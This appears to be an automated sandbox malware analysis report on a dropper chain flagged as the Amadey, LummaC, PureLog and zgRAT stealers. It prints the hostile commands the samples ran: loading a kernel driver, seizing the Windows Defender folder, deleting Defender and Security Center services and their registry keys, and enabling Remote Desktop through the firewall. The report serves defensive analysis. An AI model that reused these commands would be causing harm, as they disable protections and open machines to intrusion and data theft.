Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: eProgram Manager
Source: axplong.exe, axplong.exe, 0000000A.00000002.1854984627.00000000008B4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: ;@Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_0069DCC1 cpuid

2_2_0069DCC1

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_004BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

1_2_004BCB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_006865B0 LookupAccountNameA,

2_2_006865B0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_006C23D7 waveInStart,GetTimeZoneInformation,

2_2_006C23D7

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: Null.28.dr	Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ssisd.sys.14.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SUAosT64HD.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1368603933.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1364938881.00000000004A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1382830343.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1854236360.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1812065922.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2559760358.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1436302014.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Contains functionality to start a terminal service

Source: 3d9778a1ff.exe	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN 